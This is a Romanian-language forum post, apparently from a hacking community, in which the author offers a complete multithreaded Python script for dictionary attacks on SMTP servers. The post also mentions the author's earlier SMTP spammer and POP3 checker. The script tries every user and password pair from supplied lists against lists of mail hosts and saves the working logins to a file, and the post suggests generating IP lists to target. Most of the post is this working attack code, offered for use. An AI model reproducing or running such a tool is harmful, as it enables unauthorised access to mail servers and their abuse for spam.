Leaderboard

http://www.multiupload.com/7QZZ6NG7UK NoVirusThanks:http://vscan.novirusthanks.org/analysis/044ee30e077b7a21b4f3e0cecdc3d61c/a2VyaW5jaS1leGU=/

Postasem cu ceva vreme in urma un smtp spammer si un pop3 checker acum am facut si un brute pe liste care testeaza asincron smtp-uri generate / gasite de voi. Este scris cu simt de raspundere si cu cap nu ca restul vrajelilor care le-am vazut pe net. E destul de optim, nu va lua niciodata un host, user sau pass de 2 ori si nici nu va mai continua sa scaneze un smtp aiurea din moment ce i-a gasit o combinatie de user+pass care sa mearga. Testati-l pe smtp-uri care cer logare cu user sau pass acum depinde si de felul lui de a manevra situatiile (la esmtp mai face faze depinde cum primeste el ehlo si helo si cum reactioneaza la ele). Nu l-am facut compatibil si ssl era prea multa bataie de cap. E un dictionary attacker si nu un brute forcer, fiindca toate detaliile le preia de la user, el nu genereaza nimic. Cu generat mai sunt o sumedenie pe net si ia o tona de timp ... asa daca aveti chef faceti rapid cu un simplu backtracking niste liste de ipuri si cateva de usere si passuri. [ATENTIE] Ataca in felul urmator: pentru fiecare user, pentru fiecare pass, pentru fiecare smtp ramas in lista de scanat se incearca combinatia respectiva. Python code by cmiN - 77 lines - codepad Python 3.2 #! /usr/bin/env python3.2 # SMTP Dictionary Attack # 21.03.2011 cmiN from smtplib import SMTP from sys import argv import threading def usage(): print("\tUsage: source.ext <hosts> <users> <words> <threads> [timeout]") print("Note that hosts, users and words are text files with <EOL> separated strings.") print("Threads is an integer.") print("Timeout is a float in seconds and is optional.") print("Example: smda.py hosts.txt C:\\users.txt /tmp/words.txt 10 1") def fill_vec(name, vec): count = 0 with open(name, "rt") as fin: for x in fin: y = x.strip() if not y in vec: vec.add(y) count += 1 return count class SDA(threading.Thread): hvec = None timeout = None count = 0 fobj = None def __init__(self, user, word): threading.Thread.__init__(self) self.user = user self.word = word def run(self): for host in list(SDA.hvec): try: server = SMTP(host, timeout=SDA.timeout) server.login(self.user, self.word) server.quit() if host in SDA.hvec: SDA.hvec.remove(host) string = "%s %s %s\n" % (host, self.user, self.word) SDA.fobj.write(string) SDA.fobj.flush() SDA.count += 1 except: pass def process(hosts, users, words, threads, timeout=None): hvec, uvec, wvec = set(), set(), set() comp = fill_vec(hosts, hvec) * ((fill_vec(users, uvec) * fill_vec(words, wvec)) / threads) print("Processing %d requests per thread. Please wait..." % comp) SDA.hvec = hvec SDA.timeout = timeout SDA.fobj = open("working.txt", "at") for user in uvec: for word in wvec: while threading.active_count() > threads: pass SDA(user, word).start() while threading.active_count() > 1: pass SDA.fobj.write("=" * 50 + "\n") SDA.fobj.close() print("Finished! Were found %d working SMTPs (see 'working.txt')." % SDA.count) def main(): if len(argv) == 6: process(argv[1], argv[2], argv[3], int(argv[4]), float(argv[5])) elif len(argv) == 5: process(argv[1], argv[2], argv[3], int(argv[4])) else: usage() if __name__ == "__main__": main() EDIT: 25.03.2011

bine-ai venit